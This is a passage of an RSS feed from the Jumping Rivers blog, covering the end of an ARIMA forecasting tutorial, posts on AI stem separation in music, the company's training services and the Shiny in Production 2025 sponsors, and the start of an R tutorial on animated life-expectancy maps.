&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(test, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;blue&amp;#34;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;observed&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(predictions, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;red&amp;#34;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;ARIMA&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;month&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ylabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;passengers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;legend()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/forecast-15.png" alt="Plot showing the passenger time series for a year of monthly data. We again show the observations in blue. In red we show the 12-month forecast produced by the ARIMA model. The agreement is poor here. The predictions produce a noisy trend that gradually increases over time, from 450 passengers at month 0 to over 500 passengers at month 12. This disagrees with the observations which display a maximum of over 600 passengers at month 6 and minima of less than 400 passengers at months 1 and 10, suggesting that the model has failed to capture the seasonality of the data." /&gt;
&lt;p&gt;The agreement is poor here. As noted earlier, ARIMA does not account for
seasonal variation and we can see here the model is not able to
reproduce the peak at month 6. It would therefore be worth repeating
this analysis with the SARIMA method, which is also implemented in
&lt;code&gt;statsmodels&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;In summary, we have introduced the ARIMA framework for time series
forecasting using a real world example in Python. Along the way, we have
learned about popular data visualisations for time series data and
explored the time series analysis functions provided by the
&lt;code&gt;statsmodels&lt;/code&gt; package. Check out the &lt;a href="https://www.statsmodels.org/dev/tsa.html" rel="external"&gt;&lt;code&gt;statsmodels&lt;/code&gt;
documentation&lt;/a&gt; for more
examples.&lt;/p&gt;
&lt;p&gt;It’s worth mentioning that, while ARIMA is a powerful method for time
series forecasting, there are a number of other popular frameworks for
different use cases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;SARIMA: expands on ARIMA by including a seasonal variation.&lt;/li&gt;
&lt;li&gt;Prophet: an alternative time series framework that can capture yearly,
weekly and daily seasonality.&lt;/li&gt;
&lt;li&gt;DeepAR: an efficient deep learning algorithm designed to fit multiple
time series with a single global model. This can outperform ARIMA in
scenarios where hundreds of time series have to be modelled.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We may revisit these models in a later post. In the meantime, check out
our recent &lt;a href="https://www.jumpingrivers.com/blog/?search=vetiver" rel="external"&gt;blog
series&lt;/a&gt; on MLOps,
including model versioning, deployment and monitoring using the Vetiver
framework.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Stem Separation - How AI Has Found It's Way Into Music Production</title><link>https://www.jumpingrivers.com/blog/stem-splitting/</link><pubDate>Thu, 14 Aug 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/stem-splitting/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/stem-splitting/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/stem-splitting/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;For quite some time, AI had kept it’s grubby little hands out of the
music production world. Now, a good percentage of the plugins (a plugin
is a piece of software you can “plug in” to an audio track to add
effects or generate audio) I see are advertised as “using AI”. From
reverb removers (yes, that’s right, you can now remove the reverb from
an audio recording), to EQ analysers. Today we’ll focus on stem
separation.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-stem_splitting"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="what-is-a-stem"&gt;What is a stem?&lt;/h2&gt;
&lt;p&gt;I’m approaching this blog as more of an introduction to stem separation.
There might be a follow-up with more technical details later on, but
plenty of articles already cover the details in depth.&lt;/p&gt;
&lt;p&gt;Before we can separate stems, we need to know what a stem is.&lt;/p&gt;
&lt;p&gt;Every song that you or I listen two will likely contain multiple
instruments/elements. A classic band line up might have a drummer,
bassist, guitarist and singer. Orchestras can have up to 60 musicians!
Nowadays, the vast majority of songs are produced in a Digital Audio
Workstation (DAW) in which the number of tracks you can have is really
only limited by the power of your computer.&lt;/p&gt;
&lt;p&gt;A stem is an audio file from one of the above set ups that represents
groups of audio tracks that have been recorded for a song. There could
be a vocal stem, containing all lead and background vocals combined into
one audio track or a drums stem with the kick, snare, hi-hats, etc mixed
together.&lt;/p&gt;
&lt;h2 id="what-is-stem-separation"&gt;What is stem separation?&lt;/h2&gt;
&lt;p&gt;Take a piece of cake. What if I wanted to return it into it’s
constituent parts of egg, flour, sugar etc? Well, I can’t. With stem
separation, we can take an audio file containing several stems, and
separating it up into several audio files - one for each stem. Phew, I
can get my eggs back!&lt;/p&gt;
&lt;h2 id="why-is-this-useful"&gt;Why is this useful?&lt;/h2&gt;
&lt;p&gt;Stem separation is useful because it unlocks creative, educational, and
professional possibilities from a mixed audio track - even when the
original session files are unavailable.&lt;/p&gt;
&lt;p&gt;There are some legitimate legal uses of stem separation. The best one
that comes to mind is the last ever Beatles song, Now And Then. &lt;a href="https://www.youtube.com/watch?v=APJAQoSCwuA&amp;ab_channel=TheBeatlesVEVO" rel="external"&gt;AI was
used to extract John Lennon’s vocals from an old
demo&lt;/a&gt;,
and then, Paul McCartney / Ringo Star turned it into the last ever
Beatles record.&lt;/p&gt;
&lt;p&gt;On the other hand, stem separation gives almost anyone with an internet
connection the ability to access the stems of virtually any song -
offering music producers a treasure trove of isolated vocals (and
lawsuits).&lt;/p&gt;
&lt;h2 id="whats-behind-the-magic"&gt;What’s behind the magic?&lt;/h2&gt;
&lt;p&gt;Machine learning models. Think of it this way - every instrument makes a
sound that usually has a fairly identifiable pattern on a spectrogram.
The main body of a hi-hat lies around 10-15khz whilst the energy of a
bass guitar lies anywhere between 50 - 200hz. Sure, two different
hi-hats will have difference waveforms and frequencies but the general
pattern is the same.&lt;/p&gt;
&lt;p&gt;&lt;img
src="https://www.jumpingrivers.com/blog/stem-splitting/images/hi-hat-freq.png"
alt="Frequency graph of a hi-hat."
style="display: block; margin: auto; width:55%;"
/&gt;&lt;/p&gt;
&lt;p&gt;Frequency graph of a hi-hat.&lt;/p&gt;
&lt;br /&gt;
&lt;p&gt;&lt;img
src="https://www.jumpingrivers.com/blog/stem-splitting/images/bass-freq.png"
alt="Frequency graph of a bass guitar."
style="display: block; margin: auto; width:55%;"
/&gt;&lt;/p&gt;
&lt;p&gt;Frequency graph of a bass guitar.&lt;/p&gt;
&lt;p&gt;These models are trained to understand frequency data of songs where the
stems are available. Once we know that, we can apply filters to pick and
choose which frequencies we want to keep from the original song.&lt;/p&gt;
&lt;p&gt;Of course, it’s a bit more complicated than that. For more technical
details you can head to &lt;a href="https://www.linkedin.com/pulse/machine-learning-models-behind-musicais-stem-service-scott-josephson-d5ttf/" rel="external"&gt;this
article&lt;/a&gt;
which focuses on the model behind music.ai’s stem separation (music.ai
claim to have the best model).&lt;/p&gt;
&lt;h2 id="how-accurate-is-it"&gt;How accurate is it?&lt;/h2&gt;
&lt;p&gt;Like any models, to measure it’s accuracy you have to have training data
where you have the original stems.&lt;/p&gt;
&lt;p&gt;Once the stems are separated, accuracy evaluation is done using SDR -
Signal-to-Distortion Ratio. This is basically a measure of how much
distortion / artefacts have been introduced during the separation
process compared to the original stem. 100% is perfect, 0% is nope!&lt;/p&gt;
&lt;p&gt;Anyway, I’ll leave the SDR calculation til the next blog. To test it’s
accuracy, why don’t we actually split some stems?&lt;/p&gt;
&lt;h2 id="an-example"&gt;An example&lt;/h2&gt;
&lt;p&gt;Let’s take this 8 bar loop consisting of drums, bass, guitar and vocal
samples that I put together (all royalty free, of course).&lt;/p&gt;
&lt;video controls="controls"&gt;
&lt;source src="images/pre-sep-vid.mov"&gt;
&lt;/video&gt;
&lt;p&gt;I’m using the inbuilt stem splitter from Logic Pro, the native DAW to
Mac OS. Generally considered to be lacking compared to other tools such
as music.ai, or lalal.ai. But it’s good for an example!&lt;/p&gt;
&lt;p&gt;It takes maybe 4 seconds to run an audio clip of this size through the
stem splitter, and this is the result&lt;/p&gt;
&lt;video controls="controls"&gt;
&lt;source src="images/post-sep-vid.mov"&gt;
&lt;/video&gt;
&lt;p&gt;You can clearly hear the distortion and artefacts that have been
introduced into each clip. We’re still at the stage where stem
separation algorithms struggle with music that has lots of hard
transients (i.e. drums) or lots of components that share the same
frequency range. It’s easy to hear the audio ducking in the vocals, bass
and guitar when the drums are hitting and it has struggled quite badly
on the guitar.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/stem-splitting/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>How We Do Training at Jumping Rivers: Seamless, Expert-Led, and Tailored to You</title><link>https://www.jumpingrivers.com/blog/jr-training-2025-r-python-bayesian-statistics-machine-learning/</link><pubDate>Tue, 12 Aug 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jr-training-2025-r-python-bayesian-statistics-machine-learning/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jr-training-2025-r-python-bayesian-statistics-machine-learning/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jr-training-2025-r-python-bayesian-statistics-machine-learning/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;When it comes to data science training, one size doesn’t fit all.
At &lt;a href="https://jmpr.io/" rel="external"&gt;Jumping Rivers&lt;/a&gt;, we’ve built our reputation around delivering customised,
expert-led training that actually fits your team’s goals, tools, and workflows -
whether you&amp;rsquo;re in healthcare, government, finance, or beyond.&lt;/p&gt;
&lt;p&gt;From your first enquiry to post-course follow-up, our training
process is fully managed by our experienced admin team.
They act as project managers, coordinating every detail to
ensure your training runs smoothly.&lt;/p&gt;
&lt;p&gt;Checkout our &lt;a href="https://jmpr.io/training" rel="external"&gt;training page&lt;/a&gt; for more information or to see our course
catalogue and upcoming open courses.&lt;/p&gt;
&lt;h2 id="start-with-a-free-training-audit"&gt;Start with a Free Training Audit&lt;/h2&gt;
&lt;p&gt;Not sure what your team needs? That’s what our &lt;strong&gt;free training audit&lt;/strong&gt; is for.
We’ll assess your current skill levels, challenges, and goals then design a
course (or training pathway) that hits the mark. No guesswork, just clarity.&lt;/p&gt;
&lt;h2 id="moving-beyond-legacy-tools"&gt;Moving beyond legacy tools?&lt;/h2&gt;
&lt;p&gt;We’ve helped multiple organisations &lt;strong&gt;transition from legacy
tools like SPSS, SAS, or proprietary R setups into streamlined
workflows using R, Python, and SQL.&lt;/strong&gt; Whether you&amp;rsquo;re modernising your
analytical toolchain or just starting the journey, we can support
smooth and confident transitions.&lt;/p&gt;
&lt;p&gt;We also assist with setting up &lt;strong&gt;consistent, reproducible documents
and reports&lt;/strong&gt; using &lt;strong&gt;Quarto&lt;/strong&gt; across your team, ensuring your outputs
look great and follow best practices in reproducible research.&lt;/p&gt;
&lt;h2 id="what-makes-jumping-rivers-training-different"&gt;What Makes Jumping Rivers Training Different?&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Tailored Content:&lt;/strong&gt; Every course is designed around your data, your workflows, and your team’s skill level.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Expert Trainers:&lt;/strong&gt; Our trainers are experienced data scientists, not just instructors.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Full Admin Support:&lt;/strong&gt; You get project-managed coordination from enquiry to delivery.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Flexible Delivery:&lt;/strong&gt; Online, onsite, or hybrid.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Post-Course Follow-Up:&lt;/strong&gt; We don’t disappear after the session ends. We offer optional office hours and ongoing support.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="the-jumping-rivers-training-journey"&gt;The Jumping Rivers Training Journey&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Step&lt;/th&gt;
&lt;th style="text-align: left"&gt;What Happens&lt;/th&gt;
&lt;th style="text-align: left"&gt;Who&amp;rsquo;s Involved&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;1. Enquiry&lt;/td&gt;
&lt;td style="text-align: left"&gt;You contact us via email, website, or framework&lt;/td&gt;
&lt;td style="text-align: left"&gt;You&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;2. Intro Call&lt;/td&gt;
&lt;td style="text-align: left"&gt;We assess your team’s needs&lt;/td&gt;
&lt;td style="text-align: left"&gt;You &amp;amp; JR Trainer &amp;amp; Admin&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;3. Proposal&lt;/td&gt;
&lt;td style="text-align: left"&gt;Customised schedule + pricing sent for approval&lt;/td&gt;
&lt;td style="text-align: left"&gt;JR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;4. Coordination&lt;/td&gt;
&lt;td style="text-align: left"&gt;We handle all the logistics&lt;/td&gt;
&lt;td style="text-align: left"&gt;JR Admin Team&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;5. Delivery&lt;/td&gt;
&lt;td style="text-align: left"&gt;Hands-on, engaging session&lt;/td&gt;
&lt;td style="text-align: left"&gt;JR Trainer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;6. Follow-Up&lt;/td&gt;
&lt;td style="text-align: left"&gt;Feedback, future planning, optional support&lt;/td&gt;
&lt;td style="text-align: left"&gt;You &amp;amp; JR&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="what-clients-say"&gt;What Clients Say&lt;/h2&gt;
&lt;p&gt;“The Shiny course was excellent. Our team now feels confident building dashboards that actually get used.”
— Head of Data, Financial Services Firm&lt;/p&gt;
&lt;p&gt;“They handled all the admin and scheduling—it was a completely hassle-free experience.”
— L&amp;amp;D Manager, Higher Education&lt;/p&gt;
&lt;p&gt;“We wanted training that wasn’t just theoretical. JR helped us apply best practices in real-world settings.”
— Data Manager, NHS Trust&lt;/p&gt;
&lt;h2 id="lets-talk-training"&gt;Let’s Talk Training&lt;/h2&gt;
&lt;p&gt;Whether you need a one-off session, a full training pathway, or you’re just not sure where to start,
&lt;strong&gt;we’re here to help&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;📩 Book your &lt;strong&gt;free training audit&lt;/strong&gt; today, reach out to us at &lt;a href=""&gt;training@jumpingrivers.com&lt;/a&gt;. We’d love to hear from you.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jr-training-2025-r-python-bayesian-statistics-machine-learning/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: Sponsors</title><link>https://www.jumpingrivers.com/blog/sip-2025-sponsors/</link><pubDate>Tue, 05 Aug 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sip-2025-sponsors/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sip-2025-sponsors/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sip-2025-sponsors/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h3 a:after { content: unset; }
main h3 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production Conference &lt;/a&gt; wouldn&amp;rsquo;t be possible without our sponsors, so we wanted to take the time to tell you a little bit about them.&lt;/p&gt;
&lt;p&gt;Don&amp;rsquo;t miss out on this great chance to learn from R experts and network with fellow data science enthusiasts! Tickets are available at &lt;a href="https://shiny-in-production.jumpingrivers.com/#registration" rel="external"&gt;Shiny in Production website&lt;/a&gt;!&lt;/p&gt;
&lt;h3 id="posit"&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Posit (formerly known as RStudio) is a software company that builds both open‑source tools and professional solutions enabling teams to create, manage, and share reproducible data work in R, Python, and beyond.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://posit.co/" rel="external"&gt;&lt;img src="logo-posit.svg" alt="Posit" style="width: 300px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="thinkr"&gt;&lt;a href="https://thinkr.fr/" rel="external"&gt;ThinkR&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;ThinkR is a consultancy company offering development and training on R, RStudio and Shiny.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://thinkr.fr/" rel="external"&gt;&lt;img src="logo-thinkr.png" alt="thinkR" style="width: 300px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="datacove"&gt;&lt;a href="http://www.datacove.co.uk" rel="external"&gt;Datacove&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href="http://www.datacove.co.uk" rel="external"&gt;Datacove&lt;/a&gt; are a Brighton based Data and analytics consultancy, specialising in Customer Analytics (unearthing your most valuable customers), Marketing Analytics (getting more out of your marketing budget) and Process Automation.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.datacove.co.uk" rel="external"&gt;&lt;img src="logo-datacove.png" alt="Posit" style="width: 300px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="newcastle-university-solve"&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;Newcastle University Solve&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;Newcastle University Solve (NU Solve)&lt;/a&gt; has been helping businesses, public sector organisations and industries to find answers to complex challenges for more than three decades. They emerged out of the Industrial Statistics Research Unit, which had successfully engaged with enterprises since 1984.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;&lt;img src="nu-solve_logo.png" alt="NU Solve" style="width: 300px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="crc-press"&gt;&lt;a href="https://www.taylorfrancis.com/" rel="external"&gt;CRC Press&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.taylorfrancis.com/" rel="external"&gt;CRC Press&lt;/a&gt; is a scientific publisher that specializes in science, technology, engineering, mathematics, and medicine. They publish books and digital resources for researchers, academics, professionals, and students. CRC Press is part of the Taylor &amp;amp; Francis Group.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.taylorfrancis.com/" rel="external"&gt;&lt;img src="logo-crc.svg" alt="CRC Press" style="width: 300px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="r-consortium"&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The central mission of the R Consortium is to work with and provide support to the R Foundation and to the key organizations developing, maintaining, distributing and using R software through the identification, development and implementation of infrastructure projects.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;&lt;img src="r-consortium-logo.png" alt="R Consortium Logo" style="width: 300px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sip-2025-sponsors/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Animated Maps with {ggplot2} and {gganimate}</title><link>https://www.jumpingrivers.com/blog/animated-map/</link><pubDate>Thu, 31 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/animated-map/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/animated-map/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/animated-map/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In this blog post, we are going to use data from the
&lt;a href="https://cran.r-project.org/web/packages/gapminder/readme/README.html" rel="external"&gt;{gapminder}&lt;/a&gt;
R package, along with global spatial boundaries from
&lt;a href="https://public.opendatasoft.com/explore/dataset/world-administrative-boundaries/table/" rel="external"&gt;‘opendatasoft’&lt;/a&gt;.
We are going to plot the life expectancy of each country in the Americas
and animate it to see the changes from 1957 to 2007.&lt;/p&gt;
&lt;p&gt;The {gapminder} package we are using is from the
&lt;a href="https://www.gapminder.org/" rel="external"&gt;Gapminder&lt;/a&gt; foundation, an independent
educational non-proﬁt ﬁghting global misconceptions. The cover issues
like global warming, plastic in the oceans and life satisfaction.&lt;/p&gt;
&lt;p&gt;First we will load the full dataset from the gapminder package, and see
what is contained within it.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gapminder_unfiltered&amp;#34;&lt;/span&gt;, package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;gapminder&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;names&lt;/span&gt;(gapminder_unfiltered)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## [1] &amp;quot;country&amp;quot; &amp;quot;continent&amp;quot; &amp;quot;year&amp;quot; &amp;quot;lifeExp&amp;quot; &amp;quot;pop&amp;quot; &amp;quot;gdpPercap&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then we will filter the dataset to keep life expectancy data for the
years from 1952 to 2007 (in 5-year steps).&lt;/p&gt;
&lt;p&gt;A shapefile (&lt;code&gt;*.shp&lt;/code&gt;) containing the geographical boundaries of each
country can be imported using the &lt;a href="url"&gt;&lt;code&gt;{sf}&lt;/code&gt;&lt;/a&gt; R package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(sf)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;getwd&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/home/osheen/corporate-website&amp;#34;&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; world &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_read&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;content/blog/2025-animated-map/data/world-administrative-boundaries.shp&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;continent&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;} &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; world &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_read&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/world-administrative-boundaries.shp&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;continent&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## Reading layer `world-administrative-boundaries' from data source
## `/home/osheen/corporate-website/content/blog/2025-animated-map/data/world-administrative-boundaries.shp'
## using driver `ESRI Shapefile'
## Simple feature collection with 256 features and 8 fields
## Geometry type: MULTIPOLYGON
## Dimension: XY
## Bounding box: xmin: -180 ymin: -58.49861 xmax: 180 ymax: 83.6236
## Geodetic CRS: WGS 84
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(world)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## Simple feature collection with 6 features and 7 fields
## Geometry type: MULTIPOLYGON
## Dimension: XY
## Bounding box: xmin: -58.43861 ymin: -34.94382 xmax: 148.8519 ymax: 51.09111
## Geodetic CRS: WGS 84
## iso3 status color_code name
## 1 MNP US Territory USA Northern Mariana Islands
## 2 &amp;lt;NA&amp;gt; Sovereignty unsettled RUS Kuril Islands
## 3 FRA Member State FRA France
## 4 SRB Member State SRB Serbia
## 5 URY Member State URY Uruguay
## 6 GUM US Non-Self-Governing Territory GUM Guam
## region iso_3166_1_ french_shor
## 1 Micronesia MP Northern Mariana Islands
## 2 Eastern Asia &amp;lt;NA&amp;gt; Kuril Islands
## 3 Western Europe FR France
## 4 Southern Europe RS Serbie
## 5 South America UY Uruguay
